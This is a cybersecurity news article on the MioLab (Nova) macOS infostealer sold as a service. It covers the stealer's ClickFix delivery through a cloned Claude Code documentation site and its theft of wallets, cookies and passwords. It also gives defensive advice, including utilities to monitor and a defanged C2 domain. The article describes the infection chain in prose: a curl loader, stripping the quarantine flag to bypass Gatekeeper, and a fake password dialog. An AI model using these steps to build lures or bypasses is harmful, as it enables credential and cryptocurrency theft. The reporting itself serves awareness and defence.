Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
PamStealer Mimics Maccy, Silently Harvests Data
July 4, 2026
Critical FatFs Vulnerabilities Expose Millions of Embedded Devices
July 4, 2026
Critical Linux Kernel Vulnerability CVE-2023-0179 Grants Root Access
July 4, 2026
Home/Threats/MioLab Stealer for macOS Gains ClickFix Delivery, Wallet Theft, and Team API Tools
Threats

MioLab Stealer for macOS Gains ClickFix Delivery, Wallet Theft, and Team API Tools

Key Takeaways MioLab, also known as Nova, has rapidly evolved into a sophisticated Malware-as-a-Service (MaaS) platform targeting macOS users, actively advertised on Russian-speaking forums. The...

Emy Elsamnoudy
Emy Elsamnoudy
March 23, 2026 4 Min Read
48 0

Key Takeaways

  • MioLab, also known as Nova, has rapidly evolved into a sophisticated Malware-as-a-Service (MaaS) platform targeting macOS users, actively advertised on Russian-speaking forums.
  • The stealer now includes a “ClickFix” social engineering technique that leverages fake developer sites to trick victims into executing malicious Terminal commands, bypassing macOS Gatekeeper.
  • Recent updates to MioLab’s capabilities include enhanced hardware wallet extraction, Safari cookie grabbing, Apple Notes decryption, and a full Team API for automated payload generation and data exfiltration.
  • MioLab’s operators are linked to a broader cybercrime infrastructure, utilizing bulletproof hosting from FEMO IT Solutions Ltd. (Defhost) and repurposing old C2 domains for new phishing campaigns.

MioLab, an advanced macOS infostealer also identified as Nova, has solidified its position as a leading Malware-as-a-Service (MaaS) platform. This sophisticated threat is specifically engineered to compromise Apple systems, signaling a significant shift in the cybersecurity landscape where macOS is no longer considered a low-risk environment.

Table Of Content

  • Key Takeaways
  • ClickFix Delivery: Social Engineering Through the Terminal
  • What You Should Do

The malware’s prevalence on Russian-speaking underground forums underscores a growing trend where cybercriminals increasingly target macOS users. As Apple’s market share expands among high-value individuals such as software engineers, corporate executives, and cryptocurrency investors, Macs present an increasingly lucrative attack surface for threat actors.

MioLab operates through a user-friendly web panel and deploys a compact C-language payload, measuring approximately 100 KB. This minimal file size aids in evading detection by conventional signature-based antivirus solutions. The stealer is architecturally versatile, supporting both Intel x86-64 and Apple Silicon ARM64, and is compatible with macOS versions ranging from Sierra to Tahoe.

The malware’s extensive capabilities include the theft of browser credentials, draining of cryptocurrency wallets, harvesting of password manager data, and exfiltration of files. A premium module further extends its reach to hardware wallets like Ledger and Trezor, enabling the theft of critical 24-word BIP39 recovery seed phrases.

Analysts at LevelBlue have closely monitored MioLab’s rapid evolution, noting an unusually accelerated development pace for an infostealer. Reviewing changelogs up to February 2026, researchers confirmed substantial enhancements. These include a re-engineered hardware wallet extraction module, the ability to decrypt Apple Notes directly on the compromised device, a fully functional Safari cookie grabber, and the integration of a comprehensive Team API.

This newly implemented Team API significantly enhances operational efficiency for criminal groups, allowing them to programmatically generate payloads and download exfiltrated logs without direct interaction with the web panel. Furthermore, the platform incorporates Telegram bot binding, providing real-time victim notifications to organized cybercriminal affiliates, often referred to as “traffers.”

Investigations into MioLab’s infrastructure reveal that its operators manage a broader cybercrime ecosystem. The malware’s administrative panel, previously hosted at playavalon[.]org, has been repurposed to facilitate an Ethereum token airdrop phishing campaign, effectively converting residual traffic from old command-and-control indicators into new fraudulent activities.

Both MioLab’s operations and the associated phishing campaigns have been traced back to FEMO IT Solutions Ltd., a bulletproof hosting provider operating under the Defhost brand. This provider is known for sheltering various malware families, offering a protective layer against law enforcement intervention.

ClickFix Delivery: Social Engineering Through the Terminal

A particularly insidious addition to MioLab’s arsenal is its “ClickFix” infection chain. This technique employs social engineering to persuade victims into voluntarily executing malicious commands within their macOS Terminal. The malware’s panel features a one-click utility where operators simply input their server credentials, and the system automatically generates a Terminal payload. This payload is then disseminated through deceptive channels such as fake CAPTCHA pages or meticulously cloned developer portals.

Shortly before this publication, researcher Marcelo Rivero uncovered an active malvertising campaign distributing MioLab through a highly convincing replica of the Claude Code documentation site. This legitimate command-line AI tool by Anthropic was mimicked to target specific victims.

The campaign was precisely engineered to ensnare high-value targets, particularly developers who are accustomed to executing commands in the Terminal. For Windows users, the cloned site presented entirely legitimate installation instructions, appearing visually authentic. However, macOS users were served a ClickFix-style payload.

The initial stage of the attack involved a Base64-encoded URL. Once decoded and executed, this launched a curl loader designed to retrieve the Mach-O payload, deposit it into the /tmp directory, and then run an xattr -c command. This command strips Apple’s Quarantine attribute, effectively bypassing Gatekeeper’s security protections.

After circumventing Gatekeeper, the malware forcibly closed any open Terminal windows and presented a fraudulent System Preferences password dialog via AppleScript. This tactic aimed to trick users into divulging their login credentials. The captured password was subsequently validated against the local directory service using the dscl utility. Upon successful verification, MioLab initiated a comprehensive data collection process, gathering browser cookies, stored passwords, cryptocurrency wallet files, Apple Notes, Telegram session data, and documents from the user’s Desktop and Downloads folders. All collected data was then compressed into a ZIP archive and uploaded to the attacker’s command-and-control server.

What You Should Do

  • Exercise Caution with Password Prompts: Users should be highly suspicious of unexpected password dialogs, especially after installing or interacting with newly downloaded applications. Always verify the legitimacy of such prompts.
  • Monitor Sensitive System Utilities: Security teams should implement strict monitoring or blocking policies for sensitive system utilities like dscl, osascript, and system_profiler when invoked by unsigned applications.
  • Audit Access to Critical Directories: Regularly audit access to browser profile directories and the macOS Keychain file (login.keychain-db) to detect unauthorized activity.
  • Block Malicious Domains: Implement network-level blocking for known malicious domains, including socifiapp[.]com, to prevent communication with C2 servers.
  • Inspect Suspicious Network Traffic: Flag and investigate any suspicious curl POST requests directed to external APIs, as these may indicate data exfiltration attempts.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackMalwarephishingSecurityThreat

Share Article

Emy Elsamnoudy

Emy Elsamnoudy

Emy is a cybersecurity analyst and reporter specializing in threat hunting, defense strategies, and industry trends. With expertise in proactive security measures, Emily covers the tools and techniques organizations use to detect and prevent cyber attacks. She is a regular speaker at security conferences and has contributed to industry reports on threat intelligence and security operations. Emily's reporting focuses on helping organizations improve their security posture through practical, actionable insights.

Previous Post

Libyan Oil Refinery Targeted by AsyncRAT Espionage Campaign

Next Post

SEO Poisoning Campaign Impersonates 25+ Apps to Deliver AsyncRAT

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Alibaba Bans Internal Use of Claude AI Over Backdoor Concerns
July 3, 2026
Apache ActiveMQ Critical Vulnerabilities Allow DoS Attacks, System Crashes
July 3, 2026
Scammers Impersonate Brands in Gambling Ads to Drive Casino Traffic
July 3, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us